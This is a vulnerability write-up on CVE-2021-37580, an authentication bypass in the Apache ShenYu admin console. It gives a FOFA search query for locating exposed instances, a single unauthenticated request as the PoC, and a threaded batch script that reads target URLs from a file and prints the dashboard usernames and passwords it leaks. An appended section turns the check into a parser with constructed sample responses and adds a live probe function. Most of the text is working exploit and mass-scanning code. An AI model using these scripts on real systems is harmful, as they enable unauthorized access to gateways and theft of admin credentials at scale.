0x01 Vulnerability details
ShenYu (formerly Soul) is an extensible, high-performance, reactive API gateway intended for all microservice scenarios.
Because of incorrect handling of JWT authentication in the admin console (shenyu-admin), an attacker can bypass authentication in Apache ShenYu 2.3.0 and 2.4.0 and reach the management backend of the target system directly (CVE-2021-37580).
0x02 Affected versions
Apache ShenYu 2.3.0
Apache ShenYu 2.4.0
0x03 FOFA query
body="id=\"httpPath\"" && body="th:text=\"${domain}\""
0x04 Environment setup (the admin console listens on port 9095)
docker pull apache/shenyu-admin:2.4.0
docker run -d -p 9095:9095 apache/shenyu-admin:2.4.0
0x05 Reproduction
PoC
http://ip:9095/dashboardUser
Requesting /dashboardUser without any token returns the dashboard user list, including user names and passwords; the returned password can be used to log in to the admin console.
0x06 Batch PoC
# -*- coding: utf-8 -*-
# @Time : 2021/11/23 9:04
# @Auth : AD钙奶
import requests
from concurrent.futures import ThreadPoolExecutor

requests.packages.urllib3.disable_warnings()


def verify(base_url):
    # CVE-2021-37580: on 2.3.0 / 2.4.0 the admin console answers /dashboardUser
    # without a JWT, so a plain unauthenticated GET is enough to check a host.
    url = base_url + '/dashboardUser'
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    try:
        res = requests.get(url=url, headers=headers, verify=False, timeout=5)
        if res.status_code == 200 and "query dashboard users success" in res.text:
            users = res.json()['data']['dataList']
            if users:
                print(f"\033[31m[+] Target {url} is vulnerable to the JWT bypass (CVE-2021-37580)\033[0m")
                for num, i in enumerate(users, start=1):
                    print(f"\033[31m[{num}] account: {i['userName']} password: {i['password']}\033[0m")
    except Exception:
        # unreachable host, timeout, non-JSON body: treat as not vulnerable
        pass


def get_file_url():
    # one target per line in url.txt, e.g. http://ip:9095
    with open("url.txt", 'r', encoding='UTF-8') as f:
        return [line.strip() for line in f if line.strip()]


def main():
    urls = get_file_url()
    # 5 worker threads, same concurrency as the original threadpool version
    with ThreadPoolExecutor(max_workers=5) as pool:
        pool.map(verify, urls)


if __name__ == "__main__":
    main()
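The batch script above only prints results and cannot be exercised without live targets. The following is an added example (not code from the page or from the ShenYu project) that pulls the PoC's decision rule for the /dashboardUser reply into a testable function: HTTP 200, the "query dashboard users success" marker, and a non-empty data.dataList. The sample response bodies are constructed, not captured from a real host; the field names are the ones the script reads (data.dataList[].userName / .password), and admin / 123456 is ShenYu's documented default account. The "denied" body is a placeholder for a patched host, since the page does not show the real error response.

```python
import json
from dataclasses import dataclass
from typing import List, Optional
from urllib.request import Request, urlopen

# Response marker the batch PoC keys on.
SUCCESS_MARKER = "query dashboard users success"


@dataclass
class ExposedUser:
    user_name: str
    password: str
    enabled: Optional[bool] = None


def parse_dashboard_user_response(status_code: int, body: str) -> List[ExposedUser]:
    """Apply the PoC's rule to one HTTP response and return the accounts it leaks.

    An empty list means "not vulnerable or not parseable". Every odd case
    (wrong status, error page, non-JSON body, null data, rows without
    userName) yields [] instead of raising, so a scanning loop never dies
    on a single strange host.
    """
    if status_code != 200 or SUCCESS_MARKER not in body:
        return []
    try:
        payload = json.loads(body)
    except ValueError:
        return []
    if not isinstance(payload, dict):
        return []
    data = payload.get("data")
    if not isinstance(data, dict):
        return []
    rows = data.get("dataList") or []
    users: List[ExposedUser] = []
    for row in rows:
        if not isinstance(row, dict) or "userName" not in row:
            continue
        users.append(ExposedUser(
            user_name=str(row["userName"]),
            password=str(row.get("password", "")),
            enabled=row.get("enabled"),
        ))
    return users


def is_vulnerable(status_code: int, body: str) -> bool:
    # Same threshold as the batch PoC: at least one leaked account.
    return bool(parse_dashboard_user_response(status_code, body))


def probe(base_url: str, timeout: float = 5.0) -> List[ExposedUser]:
    """Send the unauthenticated GET /dashboardUser and evaluate the reply.

    Network helper for real use. Note that urllib verifies TLS certificates
    by default, unlike the requests call with verify=False in the script.
    """
    req = Request(base_url.rstrip("/") + "/dashboardUser",
                  headers={"User-Agent": "Mozilla/5.0"})  # no token header at all
    try:
        with urlopen(req, timeout=timeout) as resp:
            return parse_dashboard_user_response(
                resp.status, resp.read().decode("utf-8", "replace"))
    except Exception:
        # HTTPError (4xx/5xx), URLError, timeout: all count as "no leak"
        return []


# Constructed sample bodies (not captured from a real host).
SAMPLE_VULNERABLE_BODY = json.dumps({
    "code": 200,
    "message": "query dashboard users success",
    "data": {"dataList": [
        {"id": "1", "userName": "admin", "password": "123456", "role": 1, "enabled": True}
    ]},
})
SAMPLE_EMPTY_BODY = json.dumps({
    "code": 200, "message": "query dashboard users success", "data": {"dataList": []},
})
# Placeholder for a patched host refusing the request (real error body not on the page).
SAMPLE_DENIED_BODY = json.dumps({"code": 401, "message": "authentication required"})


if __name__ == "__main__":
    cases = {
        "vulnerable": (200, SAMPLE_VULNERABLE_BODY),
        "empty list": (200, SAMPLE_EMPTY_BODY),
        "denied": (401, SAMPLE_DENIED_BODY),
    }
    for name, (status, body) in cases.items():
        print(f"{name:10s} vulnerable={is_vulnerable(status, body)} "
              f"users={parse_dashboard_user_response(status, body)}")
```

Replace the sample bodies with `probe("http://ip:9095")` for a live check; the parser is the part worth unit-testing, and it is deliberately strict about the exact marker string so a generic 200 page (a login form served for every path, for instance) is not reported as a hit.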